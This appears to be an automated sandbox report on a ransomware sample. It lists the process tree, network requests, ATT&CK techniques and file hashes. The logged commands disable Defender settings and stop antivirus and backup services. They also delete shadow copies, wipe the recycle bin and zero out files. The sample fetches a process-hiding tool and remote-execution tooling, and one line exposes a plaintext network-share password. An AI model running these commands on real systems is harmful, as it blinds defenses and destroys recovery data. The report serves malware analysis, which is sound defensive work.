- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:2340
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:5028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:2656
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:396
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2176
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:224
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:4604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:6856
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:5504
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:6552
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:5464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:6588
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:1244
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:6748
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:4476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:6764
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:5140
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:7052
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:560
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:6872
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:1732
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:6976
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:1280
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:6596
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:2216
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:7016
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:4308
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:6756
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:6544
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:1200
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:6740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:5984
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:6708
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:6580
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:1824
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:6880
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:6116
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:6652
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:2536
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:700
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:5128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:6848
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:3764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:6808
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:6036
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:6832
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:4012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:6800
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:5736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:6940
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:1668
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:6612
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:2260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:6644
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:2232
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:6732
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:5956
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:6840
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:3804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:7036
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:2296
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:6984
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:5148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:7028
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:4620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:6660
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:5716
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:6604
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:4512
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:7008
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:2620
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:6820
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:6112
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:7068
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:1396
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:7060
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  - Launches sc.exe
  PID:1948
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  - Launches sc.exe
  PID:5588
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  - Launches sc.exe
  PID:2956
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  - Launches sc.exe
  PID:5972
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:6004
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:3880
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:4264
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:5344
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4624
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5976
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:5080
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:2756
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:1752
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:1500
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:1736
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:1316
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:544
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:2644
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:2468
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:1636
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:1412
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:3436
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.127.0.207 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:7116
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  - Blocklisted process makes network request
  PID:6624
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:1852
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:6544
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:5884
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
  2⤵
  PID:6288
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:6976

Network

DNS

raw.githubusercontent.com

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.109.133

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.108.133
GET

https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Remote address:

185.199.110.133:443

Request

GET /d35ha/ProcessHide/master/bins/ProcessHide64.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 141478
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "3bc3d78bc68a5b7b2573b11d0715f13a64eb42781d6a05c2f3015bf90df87dbc"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 8E27:25BE0:5E9831:D3CBC3:67D542F5
Accept-Ranges: bytes
Date: Sat, 15 Mar 2025 09:05:59 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600085-LCY
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1742029559.323375,VS0,VE295
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: be642baa6fb90f36aa6a8efcc31ba6e30c92630c
Expires: Sat, 15 Mar 2025 09:10:59 GMT
Source-Age: 0
DNS

www.google.com

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.180.4
GET

https://www.google.com/

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Remote address:

142.250.180.4:443

Request

GET / HTTP/1.1
Host: www.google.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 15 Mar 2025 09:06:01 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=ISO-8859-1
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-c-4e28Nj2KmEkxkVjvBGrQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Accept-CH: Sec-CH-Prefers-Color-Scheme
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AVcja2fATQ7L09C2grfUzYVKgj8bWHBbXdo8dnRKQGZc4GxYCndbUd2CX0E; expires=Thu, 11-Sep-2025 09:06:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Set-Cookie: __Secure-ENID=26.SE=fU00bsB1-EFYdK9wPWZkoqOHDIeK1gUImlONwalL1yWtQ5KvMweiHj6kCOZ4RNHpTfb506MjP_bipCqfYtnLb7vl6ZKLz_tr5kpUkUTF8yZPCqYuisE-hDsR1PA6jWlGHNVs-7I3oHAX7BbtiHLk06oanv6DvXKtUETtUysjl-qza1LKd8XFWkT8eSQ9xb-lKbkGuNGoGUWC1S5qs0WK; expires=Wed, 15-Apr-2026 01:24:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
DNS

www.poweradmin.com

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Remote address:

8.8.8.8:53

Request

www.poweradmin.com

IN A

Response

www.poweradmin.com

IN CNAME

poweradmin.com

poweradmin.com

IN A

52.1.55.52
GET

https://www.poweradmin.com/paexec/paexec.exe

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

Remote address:

52.1.55.52:443

Request

GET /paexec/paexec.exe HTTP/1.1
Host: www.poweradmin.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Cache-Control: private
Content-Type: application/octet-stream
Last-Modified: Wed, 19 Feb 2025 22:38:40 GMT
Server: Microsoft-IIS/10.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data: *.typekit.net *.poweradmin.com *.visualwebsiteoptimizer.com *.sitesearch360.com *.google.com *.googleadservices.com *.google-analytics.com *.googleusercontent.com *.googletagmanager.com *.googleapis.com *.gstatic.com *.doubleclick.net *.livechatinc.com *.authorize.net *.reddit.com *.redditstatic.com *.youtube.com *.capterra.com *.bing.com; frame-ancestors 'self' *.poweradmin.com *.authorize.net;
X-Xss-Protection: 1;
Date: Sat, 15 Mar 2025 09:06:02 GMT
Content-Length: 238200
DNS

cutewallpaper.org

mshta.exe

Remote address:

8.8.8.8:53

Request

cutewallpaper.org

IN A

Response

cutewallpaper.org

IN A

172.67.211.67

cutewallpaper.org

IN A

104.21.37.179
GET

https://cutewallpaper.org/21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg

mshta.exe

Remote address:

172.67.211.67:443

Request

GET /21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: cutewallpaper.org
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Date: Sat, 15 Mar 2025 09:06:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
vary: Accept-Encoding
cdn-requestid: ca36b4845acefa6d8967fdcdb95d28ee
CF-Cache-Status: BYPASS
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rivCvxRkgmmj3%2FXwWTa5ov%2FOz17vXYW6Kkg8Vl6fb2NoY7czNHnQxiE6EPf7GXpsbpkLAX57Ig3KMaZBOBY9qyN4ehohHNQkS3jHIKBPmdw76YpCKl%2Fvbw4ibqow6VzoH0PBHg%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 920ada518e4835dd-LHR
Content-Encoding: gzip
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=41928&min_rtt=41827&rtt_var=6743&sent=6&recv=9&lost=0&retrans=0&sent_bytes=3299&recv_bytes=691&delivery_rate=96675&cwnd=240&unsent_bytes=0&cid=0a2f54b998378820&ts=400&x=0"
DNS

c.pki.goog

mshta.exe

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.187.195
GET

http://c.pki.goog/r/gsr1.crl

mshta.exe

Remote address:

142.250.187.195:80

Request

GET /r/gsr1.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 1739
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Sat, 15 Mar 2025 08:48:28 GMT
Expires: Sat, 15 Mar 2025 09:38:28 GMT
Cache-Control: public, max-age=3000
Age: 1057
Last-Modified: Tue, 07 Jan 2025 07:28:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
GET

http://c.pki.goog/r/r4.crl

mshta.exe

Remote address:

142.250.187.195:80

Request

GET /r/r4.crl HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 200 OK

Accept-Ranges: bytes
Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts
Cross-Origin-Resource-Policy: cross-origin
Cross-Origin-Opener-Policy: same-origin; report-to="cacerts"
Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]}
Content-Length: 436
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 0
Date: Sat, 15 Mar 2025 08:48:32 GMT
Expires: Sat, 15 Mar 2025 09:38:32 GMT
Cache-Control: public, max-age=3000
Age: 1053
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Content-Type: application/pkix-crl
Vary: Accept-Encoding
DNS

c.pki.goog

mshta.exe

Remote address:

8.8.8.8:53

Request

c.pki.goog

IN A

Response

c.pki.goog

IN CNAME

pki-goog.l.google.com

pki-goog.l.google.com

IN A

142.250.187.195
GET

http://c.pki.goog/r/r1.crl

Remote address:

142.250.187.195:80

Request

GET /r/r1.crl HTTP/1.1
Cache-Control: max-age = 3000
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT
User-Agent: Microsoft-CryptoAPI/10.0
Host: c.pki.goog

Response

HTTP/1.1 304 Not Modified

Date: Sat, 15 Mar 2025 08:30:00 GMT
Expires: Sat, 15 Mar 2025 09:20:00 GMT
Age: 2226
Last-Modified: Thu, 25 Jul 2024 14:48:00 GMT
Cache-Control: public, max-age=3000
Vary: Accept-Encoding

185.199.110.133:443

https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe

tls, http

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

3.3kB
153.9kB
62
116

HTTP Request

GET https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe

HTTP Response

200
142.250.180.4:443

https://www.google.com/

tls, http

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

1.6kB
58.4kB
27
46

HTTP Request

GET https://www.google.com/

HTTP Response

200
52.1.55.52:443

https://www.poweradmin.com/paexec/paexec.exe

tls, http

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

4.9kB
250.0kB
96
182

HTTP Request

GET https://www.poweradmin.com/paexec/paexec.exe

HTTP Response

200
172.67.211.67:443

https://cutewallpaper.org/21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg

tls, http

mshta.exe

1.3kB
5.2kB
14
11

HTTP Request

GET https://cutewallpaper.org/21/skull-wallpaper-free/Skull-Wallpaper-3D-Wallpapers-Latest.jpg

HTTP Response

403
142.250.187.195:80

http://c.pki.goog/r/r4.crl

http

mshta.exe

602 B
3.9kB
8
6

HTTP Request

GET http://c.pki.goog/r/gsr1.crl

HTTP Response

200

HTTP Request

GET http://c.pki.goog/r/r4.crl

HTTP Response

200
142.250.187.195:80

http://c.pki.goog/r/r1.crl

http

384 B
355 B
4
3

HTTP Request

GET http://c.pki.goog/r/r1.crl

HTTP Response

304

8.8.8.8:53

raw.githubusercontent.com

dns

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

71 B
135 B
1
1

DNS Request

raw.githubusercontent.com

DNS Response

185.199.110.133

185.199.109.133

185.199.111.133

185.199.108.133
8.8.8.8:53

www.google.com

dns

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.180.4
8.8.8.8:53

www.poweradmin.com

dns

c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

64 B
94 B
1
1

DNS Request

www.poweradmin.com

DNS Response

52.1.55.52
8.8.8.8:53

cutewallpaper.org

dns

mshta.exe

63 B
95 B
1
1

DNS Request

cutewallpaper.org

DNS Response

172.67.211.67

104.21.37.179
8.8.8.8:53

c.pki.goog

dns

mshta.exe

56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

142.250.187.195
8.8.8.8:53

c.pki.goog

dns

mshta.exe

56 B
107 B
1
1

DNS Request

c.pki.goog

DNS Response

142.250.187.195

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Inhibit System Recovery

T1490

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5e22dd1cda88782a1f52f76e748ef957

SHA1
3231826619a06fa541e2bfb21da445bd7013b5ac

SHA256
73302eedcdcfa0f9639f0d00e50c19f7ff4b7bab9df431cfee38e4b94bd4ecec

SHA512
75039c01812a7c0bef9fc2d0b4b8867c9acf2daf6a8ade8171d8edc7c0a2ff11488554d30397fee424922346394f14eef7518943db769c35e6916bee26f16498

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f1bf4207c100442afb6f174495b7e10

SHA1
77ab64a201e4c57bbda4f0c3306bee76e9513b44

SHA256
c7787523a0e006d3ef2401f20248f6cfa69769804d402b75e04fcec463741f4d

SHA512
29bdea5620c07bae69fa2bbd9c198b7309dbd275a1251ee306e2eb28584d0c40f3d112b4c91b281fe722e711ceef0f4cdf0bd72118a54e263f6500bcf9040d94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
6c6018f4a5fc7110f4e5a164f9e38d24

SHA1
